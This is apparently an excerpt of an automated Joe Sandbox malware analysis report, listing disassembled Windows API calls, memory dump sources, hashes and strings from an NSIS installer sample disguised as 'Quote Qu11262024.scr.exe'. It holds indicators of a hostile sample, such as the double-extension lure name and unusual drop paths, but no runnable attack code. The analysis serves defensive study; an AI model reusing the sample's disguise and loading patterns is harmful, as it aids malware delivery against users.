                                                                                                    • lstrcmpiA.KERNEL32(Call,Softwoods Setup: Installing), ref: 0040476C
                                                                                                    • lstrcatA.KERNEL32(?,Call), ref: 00404778
                                                                                                    • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040478A
                                                                                                      • Part of subcall function 004057D4: GetDlgItemTextA.USER32(?,?,00000400,004047C1), ref: 004057E7
                                                                                                      • Part of subcall function 0040633E: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Quote Qu11262024.scr.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,00403303,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040353A,?,00000006,00000008,0000000A), ref: 00406396
                                                                                                      • Part of subcall function 0040633E: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004063A3
                                                                                                      • Part of subcall function 0040633E: CharNextA.USER32(?,"C:\Users\user\Desktop\Quote Qu11262024.scr.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,00403303,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040353A,?,00000006,00000008,0000000A), ref: 004063A8
                                                                                                      • Part of subcall function 0040633E: CharPrevA.USER32(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000,00403303,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040353A,?,00000006,00000008,0000000A), ref: 004063B8
                                                                                                    • GetDiskFreeSpaceA.KERNEL32(0041FD00,?,?,0000040F,?,0041FD00,0041FD00,?,00000001,0041FD00,?,?,000003FB,?), ref: 00404848
                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404863
                                                                                                      • Part of subcall function 004049BC: lstrlenA.KERNEL32(Softwoods Setup: Installing,Softwoods Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048D7,000000DF,00000000,00000400,?), ref: 00404A5A
                                                                                                      • Part of subcall function 004049BC: wsprintfA.USER32 ref: 00404A62
                                                                                                      • Part of subcall function 004049BC: SetDlgItemTextA.USER32(?,Softwoods Setup: Installing), ref: 00404A75
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                    • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pistoled\puddingstone\Flodsengenes$Call$Softwoods Setup: Installing
                                                                                                    • API String ID: 2624150263-672956518
                                                                                                    • Opcode ID: b27e30c910b10cba7f15911fb04f6bbad69f4d3e01bae9855a520657406ecd29
                                                                                                    • Instruction ID: 47b34843b3ec805cfc36255228536464ce330508079a4d6ac415590d573a6ccb
                                                                                                    • Opcode Fuzzy Hash: b27e30c910b10cba7f15911fb04f6bbad69f4d3e01bae9855a520657406ecd29
                                                                                                    • Instruction Fuzzy Hash: 00A181B1900209ABDB11EFA5CD45AAFB7B8EF85314F10843BF601B62D1DB7C99418B6D
                                                                                                    APIs
                                                                                                      • Part of subcall function 738E1215: GlobalAlloc.KERNEL32(00000040,738E1233,?,738E12CF,-738E404B,738E11AB,-000000A0), ref: 738E121D
                                                                                                    • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 738E1BA6
                                                                                                    • lstrcpyA.KERNEL32(00000008,?), ref: 738E1BEE
                                                                                                    • lstrcpyA.KERNEL32(00000408,?), ref: 738E1BF8
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 738E1C0B
                                                                                                    • GlobalFree.KERNEL32(?), ref: 738E1CEB
                                                                                                    • GlobalFree.KERNEL32(?), ref: 738E1CF0
                                                                                                    • GlobalFree.KERNEL32(?), ref: 738E1CF5
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 738E1EDC
                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 738E2065
                                                                                                    • GetModuleHandleA.KERNEL32(00000008), ref: 738E20D8
                                                                                                    • LoadLibraryA.KERNEL32(00000008), ref: 738E20E9
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 738E2142
                                                                                                    • lstrlenA.KERNEL32(00000408), ref: 738E215C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2348832635.00000000738E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 738E0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2348743779.00000000738E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2348882252.00000000738E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2348981073.00000000738E5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_738e0000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 245916457-0
                                                                                                    • Opcode ID: 18c06008021fca8be5f0fedc29ae440d8df2ac66597303edc132b4e5154d1902
                                                                                                    • Instruction ID: c55dae0672fdb13c10d94f43fece0d30ca1e79e3d278aae258f6690d631c95a1
                                                                                                    • Opcode Fuzzy Hash: 18c06008021fca8be5f0fedc29ae440d8df2ac66597303edc132b4e5154d1902
                                                                                                    • Instruction Fuzzy Hash: 8222B17198420ADFDB11DFE4C8827ADBBF6FB06315F1485AED2A7E2284D7709A41CB50
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(00408408,?,00000001,004083F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402153
                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004083F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402202
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pistoled\puddingstone\Flodsengenes\Opkaldtes, xrefs: 00402193
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                                                    • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pistoled\puddingstone\Flodsengenes\Opkaldtes
                                                                                                    • API String ID: 123533781-4271999429
                                                                                                    • Opcode ID: d49c757e41b333ae242ec00b234cc1e0b3d171e683555c01fafebc96deca5f83
                                                                                                    • Instruction ID: 6183f8839257a86ebc7b05cd383e7c225745c80a733fbd2daa8d40904416fefc
                                                                                                    • Opcode Fuzzy Hash: d49c757e41b333ae242ec00b234cc1e0b3d171e683555c01fafebc96deca5f83
                                                                                                    • Instruction Fuzzy Hash: DC510671A00208BFCB10DFE4C989A9D7BB6EF48318F2085AAF515EB2D1DA799941CF54
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040270D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 1974802433-0
                                                                                                    • Opcode ID: 153235b069ccda54dae20a9d3b00ef6b1fb524570a8e3acd497963ef69926340
                                                                                                    • Instruction ID: 094332d70ca1e491c234d7250a1fcb680c4b0b5581d03ef7141d5417bfcc5452
                                                                                                    • Opcode Fuzzy Hash: 153235b069ccda54dae20a9d3b00ef6b1fb524570a8e3acd497963ef69926340
                                                                                                    • Instruction Fuzzy Hash: BCF05572240010DBC700E7A49A49DFEB7ACCF11328F60457BE282F20C0C7B88A42873A
                                                                                                    APIs
                                                                                                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404369
                                                                                                    • GetDlgItem.USER32(00000000,000003E8), ref: 0040437D
                                                                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
                                                                                                    • GetSysColor.USER32(?), ref: 004043AC
                                                                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043BB
                                                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043CA
                                                                                                    • lstrlenA.KERNEL32(?), ref: 004043CD
                                                                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043DC
                                                                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F1
                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404453
                                                                                                    • SendMessageA.USER32(00000000), ref: 00404456
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404481
                                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C1
                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 004044D0
                                                                                                    • SetCursor.USER32(00000000), ref: 004044D9
                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 004044EF
                                                                                                    • SetCursor.USER32(00000000), ref: 004044F2
                                                                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040451E
                                                                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404532
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                    • String ID: Call$N
                                                                                                    • API String ID: 3103080414-3438112850
                                                                                                    • Opcode ID: 0c968106e8d883bb14fe98f1b6ae28756d552618529139a26f6dc2dd7f4833b3
                                                                                                    • Instruction ID: 5467620291def9f0cb7e653f2c75e0a221fb427c463d83c88ee12cfaff6fab55
                                                                                                    • Opcode Fuzzy Hash: 0c968106e8d883bb14fe98f1b6ae28756d552618529139a26f6dc2dd7f4833b3
                                                                                                    • Instruction Fuzzy Hash: 1061C3B1A00209BFEB109F61DD45F6A7B69FB84714F10803AFB01BA1D1C7B8A951CF98
                                                                                                    APIs
                                                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                    • DrawTextA.USER32(00000000,00423F20,000000FF,00000010,00000820), ref: 00401156
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                    • String ID: F
                                                                                                    • API String ID: 941294808-1304234792
                                                                                                    • Opcode ID: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
                                                                                                    • Instruction ID: efe066deb40a78245321151b9dab29af26a41e73ee4a669cec0cc25ab5e9cd35
                                                                                                    • Opcode Fuzzy Hash: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
                                                                                                    • Instruction Fuzzy Hash: 89418C71800209AFCF058F95DE459AFBBB9FF45315F00802EF5A1AA1A0CB389A55DFA4
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405ED4,?,?), ref: 00405D74
                                                                                                    • GetShortPathNameA.KERNEL32(?,00422AC0,00000400), ref: 00405D7D
                                                                                                      • Part of subcall function 00405BD2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
                                                                                                      • Part of subcall function 00405BD2: lstrlenA.KERNEL32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C14
                                                                                                    • GetShortPathNameA.KERNEL32(?,00422EC0,00000400), ref: 00405D9A
                                                                                                    • wsprintfA.USER32 ref: 00405DB8
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00422EC0,C0000000,00000004,00422EC0,?,?,?,?,?), ref: 00405DF3
                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E02
                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E3A
                                                                                                    • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,004226C0,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00405E90
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405EA1
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EA8
                                                                                                      • Part of subcall function 00405C6D: GetFileAttributesA.KERNELBASE(00000003,00402DF6,C:\Users\user\Desktop\Quote Qu11262024.scr.exe,80000000,00000003), ref: 00405C71
                                                                                                      • Part of subcall function 00405C6D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                    • String ID: %s=%s$[Rename]
                                                                                                    • API String ID: 2171350718-1727408572
                                                                                                    • Opcode ID: 635e32cc5c42fd155e1a6103c98ae15e5a50bcbf0d4c846cba454e3c086490ba
                                                                                                    • Instruction ID: c598f6bdad383ce04f412cf173cc8d2b3b184de741377e4f3992d2474cc2d7fa
                                                                                                    • Opcode Fuzzy Hash: 635e32cc5c42fd155e1a6103c98ae15e5a50bcbf0d4c846cba454e3c086490ba
                                                                                                    • Instruction Fuzzy Hash: C631C331200B15BBD2206B75EE49F6B3A5CDF85758F14043AF981F62D2DB7CA9018ABD
                                                                                                    APIs
                                                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Quote Qu11262024.scr.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,00403303,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040353A,?,00000006,00000008,0000000A), ref: 00406396
                                                                                                    • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004063A3
                                                                                                    • CharNextA.USER32(?,"C:\Users\user\Desktop\Quote Qu11262024.scr.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,00403303,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040353A,?,00000006,00000008,0000000A), ref: 004063A8
                                                                                                    • CharPrevA.USER32(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000,00403303,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040353A,?,00000006,00000008,0000000A), ref: 004063B8
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040633F
                                                                                                    • *?|<>/":, xrefs: 00406386
                                                                                                    • "C:\Users\user\Desktop\Quote Qu11262024.scr.exe", xrefs: 0040637A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$Next$Prev
                                                                                                    • String ID: "C:\Users\user\Desktop\Quote Qu11262024.scr.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                    • API String ID: 589700163-645153422
                                                                                                    • Opcode ID: 096eed3e07655558447cba4fe868cf82c79cb4728298f77ddcd2d6580ccfabae
                                                                                                    • Instruction ID: e256bf53f2bf7f1db487ac9dc9c07131b2aa4a215ad0ab875251a79b4c50c1ef
                                                                                                    • Opcode Fuzzy Hash: 096eed3e07655558447cba4fe868cf82c79cb4728298f77ddcd2d6580ccfabae
                                                                                                    • Instruction Fuzzy Hash: 7111E2618047952DEB3216284D80B776F9D8B56760F1A047FECC2722C2CA7C5C6296AD
                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(?,000000EB), ref: 004041F7
                                                                                                    • GetSysColor.USER32(00000000), ref: 00404235
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00404241
                                                                                                    • SetBkMode.GDI32(?,?), ref: 0040424D
                                                                                                    • GetSysColor.USER32(?), ref: 00404260
                                                                                                    • SetBkColor.GDI32(?,?), ref: 00404270
                                                                                                    • DeleteObject.GDI32(?), ref: 0040428A
                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404294
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2320649405-0
                                                                                                    • Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                                                                                    • Instruction ID: 52c6a6951caa399060ec8b38b53272cb2a551d95d69ed30fa1f6d562fb6cbf50
                                                                                                    • Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                                                                                    • Instruction Fuzzy Hash: 5B2165716007049BCB319F68D948B5B7BF8AF81754B04897EFA96A22E0D738E854CB54
                                                                                                    APIs
                                                                                                      • Part of subcall function 738E1215: GlobalAlloc.KERNEL32(00000040,738E1233,?,738E12CF,-738E404B,738E11AB,-000000A0), ref: 738E121D
                                                                                                    • GlobalFree.KERNEL32(?), ref: 738E25A2
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 738E25DC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2348832635.00000000738E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 738E0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2348743779.00000000738E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2348882252.00000000738E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2348981073.00000000738E5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_738e0000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$Free$Alloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1780285237-0
                                                                                                    • Opcode ID: a4e339979413c7add83e950485098bb9a70f22131efd86b4ff18a9920274ee60
                                                                                                    • Instruction ID: 7845c1d6ea49a54b352eeee3b56911f4e3e03825b7cefb362148761585da9342
                                                                                                    • Opcode Fuzzy Hash: a4e339979413c7add83e950485098bb9a70f22131efd86b4ff18a9920274ee60
                                                                                                    • Instruction Fuzzy Hash: 2F411D72184209EFD346EFA4CD95E2A7BBBEB87702B18496CF66583240C7719D04CF61
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(00000000,00000000), ref: 00402D2C
                                                                                                    • GetTickCount.KERNEL32 ref: 00402D4A
                                                                                                    • wsprintfA.USER32 ref: 00402D78
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D8B,00000000,?), ref: 00405234
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(00402D8B,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D8B,00000000), ref: 00405244
                                                                                                      • Part of subcall function 004051FB: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00402D8B,00402D8B,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000,00000000,00000000), ref: 00405257
